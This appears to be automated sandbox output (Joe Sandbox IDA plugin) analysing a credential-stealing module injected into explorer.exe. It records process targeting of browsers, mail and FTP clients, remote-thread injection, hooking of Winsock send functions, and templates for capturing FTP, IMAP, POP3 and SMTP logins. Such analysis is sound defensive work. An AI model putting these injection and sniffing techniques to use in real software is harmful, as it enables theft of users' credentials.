                                                                                                        • Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                        • Instruction ID: eadcac103f6ded0972b1c8f5b6fe416202d02949734da3f02d76e5dc4ef3d463
                                                                                                        • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                        • Instruction Fuzzy Hash: 83D02224706A040BFF2CBBFA0C8D2347AD2E758312B088028B808C3252DD39CC85C301

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:10.3%
                                                                                                        Dynamic/Decrypted Code Coverage:97.4%
                                                                                                        Signature Coverage:27.5%
                                                                                                        Total number of Nodes:306
                                                                                                        Total number of Limit Nodes:42
                                                                                                        execution_graph 707 587728 708 587904 707->708 709 58774b 707->709 708->708 710 58785a LoadLibraryA 709->710 713 58789f VirtualProtect VirtualProtect 709->713 711 587871 710->711 711->709 714 587883 GetProcAddress 711->714 713->708 714->711 715 587899 714->715 991 58245e lstrlen 992 5824a5 991->992 993 582476 CryptBinaryToStringA 991->993 993->992 994 582489 993->994 997 582861 GetProcessHeap RtlAllocateHeap 994->997 996 582494 CryptBinaryToStringA 996->992 997->996 716 581000 717 581010 716->717 718 581007 716->718 720 581016 718->720 769 582608 VirtualQuery 720->769 723 581097 723->717 725 58102c RtlMoveMemory 726 58104d 725->726 727 581071 NtUnmapViewOfSection GetCurrentProcessId 725->727 806 582861 GetProcessHeap RtlAllocateHeap 726->806 729 58109e 727->729 730 581092 727->730 772 5810a4 729->772 730->723 733 581095 730->733 732 581052 RtlMoveMemory 732->727 807 581332 733->807 734 5810a3 736 582861 GetProcessHeap RtlAllocateHeap 734->736 737 5810cc 736->737 738 5810dc CreateToolhelp32Snapshot 737->738 739 5810f0 Process32First 738->739 740 581322 Sleep 738->740 741 58131b CloseHandle 739->741 742 58110c lstrcmpiA 739->742 740->738 741->740 743 581124 lstrcmpiA 742->743 766 581280 742->766 744 581138 lstrcmpiA 743->744 743->766 746 58114c lstrcmpiA 744->746 744->766 745 5825ad OpenProcess IsWow64Process IsWow64Process CloseHandle 745->766 747 581160 lstrcmpiA 746->747 746->766 749 581170 lstrcmpiA 747->749 747->766 748 581305 Process32Next 748->742 750 581319 748->750 751 581184 lstrcmpiA 749->751 749->766 750->741 752 581198 lstrcmpiA 751->752 751->766 753 5811ac lstrcmpiA 752->753 752->766 754 5811c0 lstrcmpiA 753->754 753->766 755 5811d4 lstrcmpiA 754->755 754->766 756 5811e8 lstrcmpiA 755->756 755->766 758 5811fc lstrcmpiA 756->758 756->766 757 582608 VirtualQuery 757->766 759 58120c lstrcmpiA 758->759 758->766 761 58121c lstrcmpiA 759->761 759->766 760 
5812ae lstrcmpiA 760->766 762 58122c lstrcmpiA 761->762 761->766 763 58123c lstrcmpiA 762->763 762->766 765 58124c lstrcmpiA 763->765 763->766 764 581819 30 API calls 764->766 765->766 767 58125c lstrcmpiA 765->767 766->745 766->748 766->757 766->760 766->764 767->766 768 58126c lstrcmpiA 767->768 768->748 768->766 770 58101e 769->770 770->723 771 582861 GetProcessHeap RtlAllocateHeap 770->771 771->725 834 582861 GetProcessHeap RtlAllocateHeap 772->834 774 5810cc 775 5810dc CreateToolhelp32Snapshot 774->775 776 5810f0 Process32First 775->776 777 581322 Sleep 775->777 778 58131b CloseHandle 776->778 779 58110c lstrcmpiA 776->779 777->775 778->777 780 581124 lstrcmpiA 779->780 799 581280 779->799 781 581138 lstrcmpiA 780->781 780->799 783 58114c lstrcmpiA 781->783 781->799 784 581160 lstrcmpiA 783->784 783->799 786 581170 lstrcmpiA 784->786 784->799 785 581305 Process32Next 785->779 787 581319 785->787 788 581184 lstrcmpiA 786->788 786->799 787->778 789 581198 lstrcmpiA 788->789 788->799 790 5811ac lstrcmpiA 789->790 789->799 791 5811c0 lstrcmpiA 790->791 790->799 792 5811d4 lstrcmpiA 791->792 791->799 793 5811e8 lstrcmpiA 792->793 792->799 795 5811fc lstrcmpiA 793->795 793->799 794 582608 VirtualQuery 794->799 796 58120c lstrcmpiA 795->796 795->799 798 58121c lstrcmpiA 796->798 796->799 797 5812ae lstrcmpiA 797->799 798->799 800 58122c lstrcmpiA 798->800 799->785 799->794 799->797 835 5825ad OpenProcess 799->835 841 581819 799->841 800->799 801 58123c lstrcmpiA 800->801 801->799 803 58124c lstrcmpiA 801->803 803->799 804 58125c lstrcmpiA 803->804 804->799 805 58126c lstrcmpiA 804->805 805->785 805->799 806->732 887 582861 GetProcessHeap RtlAllocateHeap 807->887 809 581340 GetModuleFileNameA 888 582861 GetProcessHeap RtlAllocateHeap 809->888 811 581357 GetCurrentProcessId wsprintfA 889 58263e CryptAcquireContextA 811->889 814 58139c Sleep 894 5824d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 814->894 815 58140d 912 582843 815->912 

                                                                                                        Callgraph


                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 00582608: VirtualQuery.KERNEL32(00584434,?,0000001C), ref: 00582615
                                                                                                          • Part of subcall function 00582861: GetProcessHeap.KERNEL32(00000008,0000A000,005810CC), ref: 00582864
                                                                                                          • Part of subcall function 00582861: RtlAllocateHeap.NTDLL(00000000), ref: 0058286B
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00581038
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0058106B
                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00581074
                                                                                                        • GetCurrentProcessId.KERNEL32(?,00581010), ref: 0058107A
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005810DF
                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 005810FE
                                                                                                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0058111A
                                                                                                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0058112E
                                                                                                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00581142
                                                                                                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00581156
                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00581166
                                                                                                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0058117A
                                                                                                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0058118E
                                                                                                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 005811A2
                                                                                                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 005811B6
                                                                                                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 005811CA
                                                                                                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 005811DE
                                                                                                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 005811F2
                                                                                                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00581206
                                                                                                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00581216
                                                                                                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00581226
                                                                                                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00581236
                                                                                                        • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00581246
                                                                                                        • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00581256
                                                                                                        • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00581266
                                                                                                        • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00581276
                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 005812B4
                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0058130B
                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 0058131C
                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00581327
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                                                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                        • API String ID: 2555639992-1680033604
                                                                                                        • Opcode ID: 695a1b559b075e4d193dd566be9111642ca515b98bfe6aea47608f0cbcefed6e
                                                                                                        • Instruction ID: 9b1b9a977d58da684a2f471a5973eb75017f444a3d7259be621f5b4ebf04f40d
                                                                                                        • Opcode Fuzzy Hash: 695a1b559b075e4d193dd566be9111642ca515b98bfe6aea47608f0cbcefed6e
                                                                                                        • Instruction Fuzzy Hash: 16718730504706ABDB10FBB19C49E6A7FACBF55B90F040929FD41F2091EF25D90ACB69

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 00582861: GetProcessHeap.KERNEL32(00000008,0000A000,005810CC), ref: 00582864
                                                                                                          • Part of subcall function 00582861: RtlAllocateHeap.NTDLL(00000000), ref: 0058286B
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005810DF
                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 005810FE
                                                                                                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0058111A
                                                                                                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0058112E
                                                                                                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00581142
                                                                                                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00581156
                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00581166
                                                                                                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0058117A
                                                                                                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0058118E
                                                                                                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 005811A2
                                                                                                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 005811B6
                                                                                                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 005811CA
                                                                                                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 005811DE
                                                                                                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 005811F2
                                                                                                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00581206
                                                                                                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00581216
                                                                                                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00581226
                                                                                                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00581236
                                                                                                        • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00581246
                                                                                                        • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00581256
                                                                                                        • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00581266
                                                                                                        • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00581276
                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 005812B4
                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0058130B
                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 0058131C
                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00581327
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                                                                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                        • API String ID: 3950187957-1680033604
                                                                                                        • Opcode ID: b22e721435c45cc854168f21eb60fcb3a57d60e0cec1671182f04354b6d4af71
                                                                                                        • Instruction ID: 1783c81b96d9d5d1c1b0a25a0569de9adb2250a4df6f99209c89ceaeb6a7557c
                                                                                                        • Opcode Fuzzy Hash: b22e721435c45cc854168f21eb60fcb3a57d60e0cec1671182f04354b6d4af71
                                                                                                        • Instruction Fuzzy Hash: FD515171604706A7DB10FBB18C4AE6E7EECBA45B90B440929FD41F2090EF25D90ACB79

                                                                                                        Control-flow Graph

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000586000.00000040.80000000.00040000.00000000.sdmp, Offset: 00586000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_586000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d9aa14b8831401814b993d4702949b28b1fc12fe303dd09e449a95f8c380e47d
                                                                                                        • Instruction ID: b9292f1849370d818214069f7921c7e974f45da52ea72b643788fe9d4324b150
                                                                                                        • Opcode Fuzzy Hash: d9aa14b8831401814b993d4702949b28b1fc12fe303dd09e449a95f8c380e47d
                                                                                                        • Instruction Fuzzy Hash: 51512B7194C3954FD721AA78CC846B07FA0FB5A320B390679CDE5DB3C6E7949806C760

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000A000,005810CC), ref: 00582864
                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0058286B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 1357844191-0
                                                                                                        • Opcode ID: 6c2106464e95c165856168a6822e5430a9c9714dbf69adc7a7aea2be642283d8
                                                                                                        • Instruction ID: 496ff1692720f1d884088ec23c25077b94733d5b11248955b342a092c5a522db
                                                                                                        • Opcode Fuzzy Hash: 6c2106464e95c165856168a6822e5430a9c9714dbf69adc7a7aea2be642283d8
                                                                                                        • Instruction Fuzzy Hash: 2FA01270500100FFEF4017A0FC0DF053A18A750B01F0010007509D40608960014CB721

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 00582608: VirtualQuery.KERNEL32(00584434,?,0000001C), ref: 00582615
                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,74DEE800,microsoftedgecp.exe,?), ref: 0058184E
                                                                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00581889
                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00581919
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00583428,00000016), ref: 00581940
                                                                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00581968
                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00581978
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00581992
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0058199A
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 005819A8
                                                                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 005819AF
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 005819C5
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 005819CC
                                                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 005819E2
                                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00581A0C
                                                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00581A1F
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00581A26
                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00581A2D
                                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00581A41
                                                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00581A58
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00581A65
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00581A6B
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00581A71
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00581A74
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                        • String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                                                        • API String ID: 1066286714-4141090125
                                                                                                        • Opcode ID: 3c8505a374fd48bfbe5d05a8228bdc2678623bfa7be79dfffb06eccb3cf5c11b
                                                                                                        • Instruction ID: 1c64704a992cb564274bbdf3f5e886d124368c4cfea73097e0ad1dd938871531
                                                                                                        • Opcode Fuzzy Hash: 3c8505a374fd48bfbe5d05a8228bdc2678623bfa7be79dfffb06eccb3cf5c11b
                                                                                                        • Instruction Fuzzy Hash: 59617A71205305AFD310EF65DC88E6BBFECFB99B54F000619FD49E2251DA70DA098BA6

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0058265A
                                                                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00582672
                                                                                                        • lstrlen.KERNEL32(?,00000000), ref: 0058267A
                                                                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00582685
                                                                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0058269F
                                                                                                        • wsprintfA.USER32 ref: 005826B6
                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 005826CF
                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 005826D9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                        • String ID: %02X
                                                                                                        • API String ID: 3341110664-436463671
                                                                                                        • Opcode ID: 96148755baa801799993183019ebfe819d3bc166ad659545df53c5e7e0af665a
                                                                                                        • Instruction ID: 33968c0587addd9af050fb319b1760f459a8787eeefac6f352f729e58fb46469
                                                                                                        • Opcode Fuzzy Hash: 96148755baa801799993183019ebfe819d3bc166ad659545df53c5e7e0af665a
                                                                                                        • Instruction Fuzzy Hash: 2B11FB71900108FFDB119B95EC8CEAEBFBCFB44B41F1040A5FA05E2160EA714F55AB60

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 00581B4E
                                                                                                        • LoadLibraryA.KERNEL32(?,00584434,00000000,00000000,74DF2EE0,00000000,00581910,?,?,?,00000001,?,00000000), ref: 00581B76
                                                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00581BA3
                                                                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00581BF4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                        • String ID:
                                                                                                        • API String ID: 3827878703-0
                                                                                                        • Opcode ID: 817af7cdca3b2357fc263e7d1b6592a75340b568417bab2252c58523a5d76205
                                                                                                        • Instruction ID: 995781e4f0a1bedbd5aff6a3289bae2d74a07be2f092f66ea4dc81a2e68574c4
                                                                                                        • Opcode Fuzzy Hash: 817af7cdca3b2357fc263e7d1b6592a75340b568417bab2252c58523a5d76205
                                                                                                        • Instruction Fuzzy Hash: 9831A275700A11ABCB24DF29C884B66BBECBF15316B14456CEC86E7200E731EC46CBA8

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 00582861: GetProcessHeap.KERNEL32(00000008,0000A000,005810CC), ref: 00582864
                                                                                                          • Part of subcall function 00582861: RtlAllocateHeap.NTDLL(00000000), ref: 0058286B
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0058109E,?,00581010), ref: 0058134A
                                                                                                        • GetCurrentProcessId.KERNEL32(00000003,?,0058109E,?,00581010), ref: 0058135B
                                                                                                        • wsprintfA.USER32 ref: 00581372
                                                                                                          • Part of subcall function 0058263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0058265A
                                                                                                          • Part of subcall function 0058263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00582672
                                                                                                          • Part of subcall function 0058263E: lstrlen.KERNEL32(?,00000000), ref: 0058267A
                                                                                                          • Part of subcall function 0058263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00582685
                                                                                                          • Part of subcall function 0058263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0058269F
                                                                                                          • Part of subcall function 0058263E: wsprintfA.USER32 ref: 005826B6
                                                                                                          • Part of subcall function 0058263E: CryptDestroyHash.ADVAPI32(?), ref: 005826CF
                                                                                                          • Part of subcall function 0058263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 005826D9
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00581389
                                                                                                        • GetLastError.KERNEL32 ref: 0058138F
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 005813A1
                                                                                                          • Part of subcall function 005824D5: GetCurrentProcessId.KERNEL32 ref: 005824E7
                                                                                                          • Part of subcall function 005824D5: GetCurrentThreadId.KERNEL32 ref: 005824EF
                                                                                                          • Part of subcall function 005824D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 005824FF
                                                                                                          • Part of subcall function 005824D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0058250D
                                                                                                          • Part of subcall function 005824D5: CloseHandle.KERNEL32(00000000), ref: 00582566
                                                                                                        • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 005813B8
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 005813BF
                                                                                                        • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 005813E4
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 005813EB
                                                                                                          • Part of subcall function 00581DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00581E1D
                                                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 0058141D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                                                        • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                                                        • API String ID: 706757162-1430290102
                                                                                                        • Opcode ID: 0bb66ba5770e3946892f3976f178e46020bafeb417d941dea1793bae22312685
                                                                                                        • Instruction ID: 954272d5e7eda4043ac7f2ddbaf55e800df2b65f8292578d56b7e01aa8b4ca32
                                                                                                        • Opcode Fuzzy Hash: 0bb66ba5770e3946892f3976f178e46020bafeb417d941dea1793bae22312685
                                                                                                        • Instruction Fuzzy Hash: D4314D31340615EBCF107FA1DC0EB6A3E69BB65B41F004014FE06BA2A1DB758A569BA5

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                                                                        • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                                                                        • API String ID: 3379139566-1703351401
                                                                                                        • Opcode ID: 5f794ee005dc322a0f11f18b01f6c7db63a7071dd3c08ff5805d5aa4a46c8ba7
                                                                                                        • Instruction ID: c5b6de83a1d7052998389a6eefc1ec29d8765dfd86f4c45ba62699961efa8f48
                                                                                                        • Opcode Fuzzy Hash: 5f794ee005dc322a0f11f18b01f6c7db63a7071dd3c08ff5805d5aa4a46c8ba7
                                                                                                        • Instruction Fuzzy Hash: 6A21AE36A00609ABDF107EB98C889BE7EADFB55741F084079ED05F3211DA30CE029BA4

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00581539,?,?,?,0058144B,?), ref: 00581763
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0058176A
                                                                                                        • RtlZeroMemory.NTDLL(00584228,00000104), ref: 00581788
                                                                                                        • RtlZeroMemory.NTDLL(00584118,00000104), ref: 00581790
                                                                                                        • RtlZeroMemory.NTDLL(00584330,00000104), ref: 00581798
                                                                                                        • RtlZeroMemory.NTDLL(00584000,00000104), ref: 005817A1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MemoryZero$AddressHandleModuleProc
                                                                                                        • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                                                                        • API String ID: 1490332519-278825019
                                                                                                        • Opcode ID: be9519ac6f290a0ce88af6d20fbeed697690a8aa55122e6efcaeeb67cdd7fa2e
                                                                                                        • Instruction ID: c86bcc565f6672d9d7e28d39636372a27c09517eadef23050a642bc2c9986d8c
                                                                                                        • Opcode Fuzzy Hash: be9519ac6f290a0ce88af6d20fbeed697690a8aa55122e6efcaeeb67cdd7fa2e
                                                                                                        • Instruction Fuzzy Hash: F8F0823678032D73C22032EABC0EC5BBE5CEA61FA67020151BE05B3291D99569008FB4

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 005824E7
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 005824EF
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 005824FF
                                                                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 0058250D
                                                                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0058252C
                                                                                                        • SuspendThread.KERNEL32(00000000), ref: 0058253C
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0058254B
